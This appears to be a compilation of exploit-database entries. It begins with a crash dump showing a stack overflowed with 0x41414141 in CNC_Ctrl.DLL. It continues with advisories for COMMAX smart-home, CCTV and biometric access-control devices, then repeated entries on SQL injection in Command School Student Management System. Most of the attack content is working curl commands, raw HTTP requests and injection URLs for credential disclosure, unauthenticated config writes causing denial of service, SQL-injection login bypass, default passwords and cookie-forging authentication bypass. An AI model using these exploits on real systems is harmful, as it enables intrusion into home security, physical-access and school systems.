00afe384 41414141 41414141 41414141 41414141 0x41414141
00afe388 41414141 41414141 41414141 41414141 0x41414141
00afe38c 41414141 41414141 41414141 41414141 0x41414141
00afe390 41414141 41414141 41414141 41414141 0x41414141
00afe394 41414141 41414141 41414141 41414141 0x41414141
00afe398 41414141 41414141 41414141 41414141 0x41414141
00afe39c 41414141 41414141 41414141 41414141 0x41414141
00afe3a0 41414141 41414141 41414141 41414141 0x41414141
00afe3a4 41414141 41414141 41414141 41414141 0x41414141
00afe3a8 41414141 41414141 41414141 41414141 0x41414141
00afe3ac 41414141 41414141 41414141 41414141 0x41414141
00afe3b0 41414141 41414141 41414141 41414141 0x41414141
00afe3b4 41414141 41414141 41414141 41414141 0x41414141
00afe3b8 41414141 41414141 41414141 41414141 0x41414141
00afe3bc 41414141 41414141 41414141 41414141 0x41414141
00afe3c0 41414141 41414141 41414141 41414141 0x41414141
00afe3c4 41414141 41414141 41414141 41414141 0x41414141
00afe3c8 41414141 41414141 41414141 41414141 0x41414141
00afe3cc 41414141 41414141 41414141 41414141 0x41414141
00afe3d0 41414141 41414141 41414141 41414141 0x41414141
00afe3d4 41414141 41414141 41414141 41414141 0x41414141
00afe3d8 41414141 41414141 41414141 41414141 0x41414141
00afe3dc 41414141 41414141 41414141 41414141 0x41414141
00afe3e0 41414141 41414141 41414141 41414141 0x41414141
00afe3e4 41414141 41414141 41414141 41414141 0x41414141
00afe3e8 41414141 41414141 41414141 41414141 0x41414141
00afe3ec 41414141 41414141 41414141 41414141 0x41414141
00afe3f0 41414141 41414141 41414141 41414141 0x41414141
00afe3f4 41414141 41414141 41414141 41414141 0x41414141
00afe3f8 41414141 41414141 41414141 41414141 0x41414141
00afe3fc 41414141 41414141 41414141 41414141 0x41414141
00afe400 41414141 41414141 41414141 41414141 0x41414141
00afe404 41414141 41414141 41414141 41414141 0x41414141
00afe408 41414141 41414141 41414141 41414141 0x41414141
00afe40c 41414141 41414141 41414141 41414141 0x41414141
00afe410 41414141 41414141 41414141 41414141 0x41414141
00afe414 41414141 41414141 41414141 41414141 0x41414141
00afe418 41414141 41414141 41414141 41414141 0x41414141
00afe41c 41414141 41414141 41414141 41414141 0x41414141
00afe420 41414141 41414141 41414141 41414141 0x41414141
00afe424 41414141 41414141 41414141 41414141 0x41414141
00afe428 41414141 41414141 41414141 41414141 0x41414141
00afe42c 41414141 41414141 41414141 41414141 0x41414141
00afe430 41414141 41414141 41414141 41414141 0x41414141
00afe434 41414141 41414141 41414141 41414141 0x41414141
00afe438 41414141 41414141 41414141 41414141 0x41414141
00afe43c 41414141 41414141 41414141 41414141 0x41414141
00afe440 41414141 41414141 41414141 41414141 0x41414141
00afe444 41414141 41414141 41414141 41414141 0x41414141
00afe448 41414141 41414141 41414141 41414141 0x41414141
00afe44c 41414141 41414141 41414141 41414141 0x41414141
00afe450 41414141 41414141 41414141 41414141 0x41414141
00afe454 41414141 41414141 41414141 41414141 0x41414141
00afe458 41414141 41414141 41414141 41414141 0x41414141
00afe45c 41414141 41414141 41414141 41414141 0x41414141
00afe460 41414141 41414141 41414141 41414141 0x41414141
00afe464 41414141 41414141 41414141 41414141 0x41414141
00afe468 41414141 41414141 41414141 41414141 0x41414141
00afe46c 41414141 41414141 41414141 41414141 0x41414141
00afe470 41414141 41414141 41414141 41414141 0x41414141
00afe474 41414141 41414141 41414141 41414141 0x41414141
00afe478 41414141 41414141 41414141 41414141 0x41414141
00afe47c 41414141 41414141 41414141 41414141 0x41414141
00afe480 41414141 41414141 41414141 41414141 0x41414141
00afe484 41414141 41414141 41414141 41414141 0x41414141
00afe488 41414141 41414141 41414141 41414141 0x41414141
00afe48c 41414141 41414141 41414141 41414141 0x41414141
00afe490 41414141 41414141 41414141 41414141 0x41414141
00afe494 41414141 41414141 41414141 41414141 0x41414141
00afe498 41414141 41414141 41414141 41414141 0x41414141
00afe49c 41414141 41414141 41414141 41414141 0x41414141
00afe4a0 41414141 41414141 41414141 41414141 0x41414141
00afe4a4 41414141 41414141 41414141 41414141 0x41414141
00afe4a8 41414141 41414141 41414141 41414141 0x41414141
00afe4ac 41414141 41414141 41414141 41414141 0x41414141
00afe4b0 41414141 41414141 41414141 41414141 0x41414141
00afe4b4 41414141 41414141 41414141 41414141 0x41414141
00afe4b8 41414141 41414141 41414141 41414141 0x41414141
00afe4bc 41414141 41414141 41414141 41414141 0x41414141
00afe4c0 41414141 41414141 41414141 41414141 0x41414141
00afe4c4 41414141 41414141 41414141 41414141 0x41414141
00afe4c8 41414141 41414141 41414141 41414141 0x41414141
00afe4cc 41414141 41414141 41414141 41414141 0x41414141
00afe4d0 41414141 41414141 41414141 41414141 0x41414141
00afe4d4 41414141 41414141 41414141 41414141 0x41414141
00afe4d8 41414141 41414141 41414141 41414141 0x41414141
00afe4dc 41414141 41414141 41414141 41414141 0x41414141
00afe4e0 41414141 41414141 41414141 41414141 0x41414141
00afe4e4 41414141 41414141 41414141 41414141 0x41414141
00afe4e8 41414141 41414141 41414141 41414141 0x41414141
00afe4ec 41414141 41414141 41414141 41414141 0x41414141
00afe4f0 41414141 41414141 41414141 41414141 0x41414141
00afe4f4 41414141 41414141 41414141 41414141 0x41414141
00afe4f8 41414141 41414141 41414141 41414141 0x41414141
00afe4fc 41414141 41414141 41414141 41414141 0x41414141
00afe500 41414141 41414141 41414141 41414141 0x41414141
00afe504 41414141 41414141 41414141 41414141 0x41414141
00afe508 41414141 41414141 41414141 41414141 0x41414141
00afe50c 41414141 41414141 41414141 41414141 0x41414141
00afe510 41414141 41414141 41414141 41414141 0x41414141
00afe514 41414141 41414141 41414141 41414141 0x41414141
00afe518 41414141 41414141 41414141 41414141 0x41414141
00afe51c 41414141 41414141 41414141 41414141 0x41414141
00afe520 41414141 41414141 41414141 41414141 0x41414141
00afe524 41414141 41414141 41414141 41414141 0x41414141
00afe528 41414141 41414141 41414141 41414141 0x41414141
00afe52c 41414141 41414141 41414141 41414141 0x41414141
00afe530 41414141 41414141 41414141 41414141 0x41414141
00afe534 41414141 41414141 41414141 41414141 0x41414141
00afe538 41414141 41414141 41414141 41414141 0x41414141
00afe53c 41414141 41414141 41414141 41414141 0x41414141
00afe540 41414141 41414141 41414141 41414141 0x41414141
00afe544 41414141 41414141 41414141 41414141 0x41414141
00afe548 41414141 41414141 41414141 41414141 0x41414141
00afe54c 41414141 41414141 41414141 41414141 0x41414141
00afe550 41414141 41414141 41414141 41414141 0x41414141
00afe554 41414141 41414141 41414141 41414141 0x41414141
00afe558 41414141 41414141 41414141 41414141 0x41414141
00afe55c 41414141 41414141 41414141 41414141 0x41414141
00afe560 41414141 41414141 41414141 41414141 0x41414141
00afe564 41414141 41414141 41414141 41414141 0x41414141
00afe568 41414141 41414141 41414141 41414141 0x41414141
00afe56c 41414141 41414141 41414141 41414141 0x41414141
00afe570 41414141 41414141 41414141 41414141 0x41414141
00afe574 41414141 41414141 41414141 41414141 0x41414141
00afe578 41414141 41414141 41414141 41414141 0x41414141
00afe57c 41414141 41414141 41414141 41414141 0x41414141
00afe580 41414141 41414141 41414141 41414141 0x41414141
00afe584 41414141 41414141 41414141 41414141 0x41414141
00afe588 41414141 41414141 41414141 41414141 0x41414141
00afe58c 41414141 41414141 41414141 41414141 0x41414141
00afe590 41414141 41414141 41414141 41414141 0x41414141
00afe594 41414141 41414141 41414141 41414141 0x41414141
00afe598 41414141 41414141 41414141 41414141 0x41414141
00afe59c 41414141 41414141 41414141 41414141 0x41414141
00afe5a0 41414141 41414141 41414141 41414141 0x41414141
00afe5a4 41414141 41414141 41414141 41414141 0x41414141
00afe5a8 41414141 41414141 41414141 41414141 0x41414141
00afe5ac 41414141 41414141 41414141 41414141 0x41414141
00afe5b0 41414141 41414141 41414141 41414141 0x41414141
00afe5b4 41414141 41414141 41414141 41414141 0x41414141
00afe5b8 41414141 41414141 41414141 41414141 0x41414141
00afe5bc 41414141 41414141 41414141 41414141 0x41414141
00afe5c0 41414141 41414141 41414141 41414141 0x41414141
00afe5c4 41414141 41414141 41414141 41414141 0x41414141
00afe5c8 41414141 41414141 41414141 41414141 0x41414141
00afe5cc 41414141 41414141 41414141 41414141 0x41414141
00afe5d0 41414141 41414141 41414141 41414141 0x41414141
00afe5d4 41414141 41414141 41414141 41414141 0x41414141
00afe5d8 41414141 41414141 41414141 41414141 0x41414141
00afe5dc 41414141 41414141 41414141 41414141 0x41414141
00afe5e0 41414141 41414141 41414141 41414141 0x41414141
00afe5e4 41414141 41414141 41414141 41414141 0x41414141
00afe5e8 41414141 41414141 41414141 41414141 0x41414141
00afe5ec 41414141 41414141 41414141 41414141 0x41414141
00afe5f0 41414141 41414141 41414141 41414141 0x41414141
00afe5f4 41414141 41414141 41414141 41414141 0x41414141
STACK_COMMAND: ~0s ; .cxr ; kb
THREAD_SHA1_HASH_MOD_FUNC: 1ff3866701b0a93c59477aaf393ad9182c6cbb4f
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 31358b3bd1a2fecfa57be49dd21574669d1b1ea2
THREAD_SHA1_HASH_MOD: 2219bd78d12868af57c664db206871e4461019b1
FAULT_INSTR_CODE: 12d49989
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: CNC_Ctrl!DllUnregisterServer+18ee3
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: CNC_Ctrl
IMAGE_NAME: CNC_Ctrl.DLL
DEBUG_FLR_IMAGE_TIMESTAMP: 547ed821
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+18ee3
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: CNC_Ctrl.DLL
BUCKET_ID_IMAGE_STR: CNC_Ctrl.DLL
FAILURE_MODULE_NAME: CNC_Ctrl
BUCKET_ID_MODULE_STR: CNC_Ctrl
FAILURE_FUNCTION_NAME: DllUnregisterServer
BUCKET_ID_FUNCTION_STR: DllUnregisterServer
BUCKET_ID_OFFSET: 18ee3
BUCKET_ID_MODTIMEDATESTAMP: 547ed821
BUCKET_ID_MODCHECKSUM: 357a4b
BUCKET_ID_MODVER_STR: 1.7.0.2
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: CNC_Ctrl.DLL!DllUnregisterServer
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/wscript.exe/5.812.10240.16384/7159f3df/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/00027da1.htm?Retriage=1
TARGET_TIME: 2021-08-12T11:37:22.000Z
OSBUILD: 19042
OSSERVICEPACK: 1023
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS Personal
USER_LCID: 0
OSBUILD_TIMESTAMP: unknown_date
BUILDDATESTAMP_STR: 160101.0800
BUILDLAB_STR: WinBuild
BUILDOSVER_STR: 10.0.19041.1023
ANALYSIS_SESSION_ELAPSED_TIME: 68b2
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver
FAILURE_ID_HASH: {5e1e375a-c411-e928-cd64-b7f6c07eea3b}
Followup: MachineOwner
---------
# Exploit Title: COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com
COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: n/a
Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.
Desc: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker
to disclose RTSP credentials in plain-text.
Tested on: GoAhead-Webs
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5665
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php
02.08.2021
--
$ curl http://TARGET:8086/overview.asp
<HTML>
<HEAD>
<TITLE> Infomation</TITLE>
<script src="./jquery.min.js"></script>
<script src="./jquery.cookie.js"></script>
<script src="./login_check.js"></script>
</HEAD>
<BODY>
<br><br>
<center>
<table>
<tr><td>
<li> [2021/08/15 09:56:46] Started <BR> <li> MAX USER : 32 <BR> <li> DVR Lists <BR>[1] rtsp://admin:s3cr3tP@$$w0rd@10.0.0.17:554/Streaming/Channels/2:554 <BR>
</td></tr>
</table>
</center>
</BODY>
</HTML>
$ curl http://TARGET:8086/login_check.js:
var server_ip = $(location).attr('host');
var server_domain = server_ip.replace(":8086", "");
document.domain = server_domain;
var cookiesAuth = $.cookie("cookiesAuth");
if (cookiesAuth != "authok") {
parent.document.location.href = "http://" + server_domain + ":8086/home.asp";
}
# Exploit Title: COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com
COMMAX Smart Home Ruvie CCTV Bridge DVR Service Unauthenticated Config Write / DoS
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: n/a
Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.
Desc: The application allows an unauthenticated attacker to change the configuration
of the DVR arguments and/or cause denial-of-service scenario through the setconf endpoint.
Tested on: GoAhead-Webs
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5666
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5666.php
02.08.2021
--
#1
$ curl -X POST http://192.168.1.1:8086/goform/setconf --data"manufacturer=Commax&Ch0=0&dvr0=rtsp%3A%2F%2Fadmin%3A1234zeroscience.mk%3A554%2FStream%2FCh01%3A554&dvr1=&dvr2=&dvr3=&dvr4=&dvr5=&dvr6=&dvr7=&dvr8=&dvr9=&dvr10=&dvr11=&dvr12=&dvr13=&dvr14=&dvr15=&dvr16=&dvr17=&dvr18=&dvr19=&dvr20=&dvr21=&dvr22=&dvr23=&ok=OK"
* Trying 192.168.1.1...
* TCP_NODELAY set
* Connected to 192.168.1.1 (192.168.1.1) port 8086 (#0)
> POST /goform/setconf HTTP/1.1
> Host: 192.168.1.1:8086
> User-Agent: curl/7.55.1
> Accept: */*
> Content-Length: 257
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 257 out of 257 bytes
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Server: GoAhead-Webs
< Pragma: no-cache
< Cache-control: no-cache
< Content-Type: text/html
<
<html>
<br><br><center><table><tr><td>Completed to change configuration! Restart in 10 seconds</td></tr></table></center></body></html>
* Closing connection 0
#2
$ curl -v http://192.168.1.1:8086
* Rebuilt URL to: http://192.168.1.1:8086/
* Trying 192.168.1.1...
* TCP_NODELAY set
* connect to 192.168.1.1 port 8086 failed: Connection refused
* Failed to connect to 192.168.1.1 port 8086: Connection refused
* Closing connection 0
curl: (7) Failed to connect to 192.168.1.1 port 8086: Connection refused
# Exploit Title: COMMAX Smart Home IoT Control System CDP-1020n - SQL Injection Authentication Bypass
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com
COMMAX Smart Home IoT Control System CDP-1020n SQL Injection Authentication Bypass
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: CDP-1020n
481 System
Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.
Desc: The application suffers from an SQL Injection vulnerability. Input passed
through the 'id' POST parameter in 'loginstart.asp' is not properly sanitised
before being returned to the user or used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication
mechanism.
Tested on: Microsoft-IIS/7.5
ASP.NET
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5662
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5662.php
02.08.2021
--
POST /common/loginstart.asp?joincode={{truncated}} HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/mainstart.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cookie: {}
id=%27+or+1%3D1--&x=0&y=0&pass=waddup
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 621
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: {}
X-Powered-By: ASP.NET
Date: Tue, 03 Aug 1984 22:57:56 GMT
# Exploit Title: COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com
COMMAX CVD-Axx DVR 5.1.4 Weak Default Credentials Stream Disclosure
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: CVD-AH04 DVR 4.4.1
CVD-AF04 DVR 4.4.1
CVD-AH16 DVR 5.1.4
CVD-AF16 DVR 4.4.1
CVD-AF08 DVR 5.1.2
CVD-AH08 DVR 5.1.2
Summary: COMMAX offers a wide range of proven AHD CCTV systems to meet customer
needs and convenience in single or multi-family homes.
Desc: The web control panel uses weak set of default administrative credentials that
can be easily guessed in remote password attacks and disclose RTSP stream.
Tested on: Boa/0.94.14rc19
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5667
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5667.php
02.08.2021
--
Login:
$ curl -X POST http://192.168.1.2/cgi-bin/websetup.cgi -d="passkey=1234"
HTTP/1.1 200 OK
Date: Mon, 16 Aug 2021 01:04:52 GMT
Server: Boa/0.94.14rc19
Accept-Ranges: bytes
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
IE (ActiveX) web player:
http://192.168.1.2/web_viewer2.html
Snapshots:
http://192.168.1.2/images/snapshot-01.jpg
http://192.168.1.2/images/snapshot-02.jpg
http://192.168.1.2/images/snapshot-nn.jpg
Creds:
Users: ADMIN,USER1,USER2,USER3
Password: 1234
# Exploit Title: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com
COMMAX Biometric Access Control System 1.0.0 Authentication Bypass
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: 1.0.0
Summary: Biometric access control system.
Desc: The application suffers from an authentication bypass vulnerability.
An unauthenticated attacker through cookie poisoning can bypass authentication
and disclose sensitive information and circumvent physical controls in smart
homes and buildings.
Tested on: nginx/1.14.0 (Ubuntu)
MariaDB/10.3.15
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5661
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
02.08.2021
--
The following request with Cookie forging bypasses authentication and lists available SQL backups.
GET /db_dump.php HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.1/user_add.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0
Connection: close
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 03 Aug 1984 14:07:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 10316
<!DOCTYPE html>
<html class="no-js" lang="ko">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>::: COMMAX :::</title>
...
...
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/health_allergies.php?action=edit&id=null+and+1=2+union+select+version()
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
##############
VULNERABILITY
##############
/Backup/backup_ray2.php (LINE: 78-126)
-----------------------------------------------------------------------------
// SET THE NAME OF THE BACKUP WITH A TIMESTAMP
$bkup = 'mysql' . date('Ymd\THis') . $db_name . '.txt';
$fp = fopen($bkup, "w");
// GET THE LIST OF TABLES
$sql = "SHOW TABLES";
$res = mysql_query($sql);
if (!$res) die( mysql_error() );
if (mysql_num_rows($res) == 0) die( "NO TABLES IN $db_name" );
while ($s = mysql_fetch_array($res))
{
$tables[] = $s[0];
}
// ITERATE OVER THE LIST OF TABLES
foreach ($tables as $table)
{
// WRITE THE DROP TABLE STATEMENT
fwrite($fp,"DROP TABLE `$table`;\n");
// GET THE CREATE TABLE STATEMENT
$res = mysql_query("SHOW CREATE TABLE `$table`");
if (!$res) die( mysql_error() );
$cre = mysql_fetch_array($res);
$cre[1] .= ";";
$txt = str_replace("\n", "", $cre[1]); // FIT EACH QUERY ON ONE LINE
fwrite($fp, $txt . "\n");
// GET THE TABLE DATA
$data = mysql_query("SELECT * FROM `$table`");
$num = mysql_num_fields($data);
while ($row = mysql_fetch_array($data))
{
// MAKE INSERT STATEMENTS FOR ALL THE VALUES
$txt = "INSERT INTO `$table` VALUES(";
for ($i=0; $i < $num; $i++)
{
$txt .= "'".mysql_real_escape_string($row[$i])."', ";
}
$txt = substr($txt, 0, -2);
fwrite($fp, $txt . ");\n");
}
}
// ALL DONE
fclose($fp);
-----------------------------------------------------------------------------
#####################################################
EXPLOIT
#####################################################
<html>
<title>Iphobos Blog</title>
<label><a href="http://www.example.com/sw/backup/backup_ray2.php" class="button
white">Backup Download</a></label>
</html>
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_titles.php?action=edit&id=null+and+1=2+union+select+version()
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_terms.php?action=edit&id=null+and+1=2+union+select+version()
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_subjects.php?action=edit&id=null+and+1=2+union+select+version()
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_sgrades.php?action=edit&id=null+and+1=2+union+select+version()
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_school_years.php?action=edit&id=null+and+1=2+union+select+version()
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_school_names.php?action=edit&id=null+and+1=2+union+select+version()
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_relations.php?action=edit&id=null+and+1=2+union+select+version()
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_media_codes_1.php?action=edit&id=null+and+1=2+union+select+version(),2,3
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_infraction_codes.php?action=edit&id=null+and+1=2+union+select+version()
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_grades.php?action=edit&id=null+and+1=2+union+select+version()
source: https://www.securityfocus.com/bid/64707/info
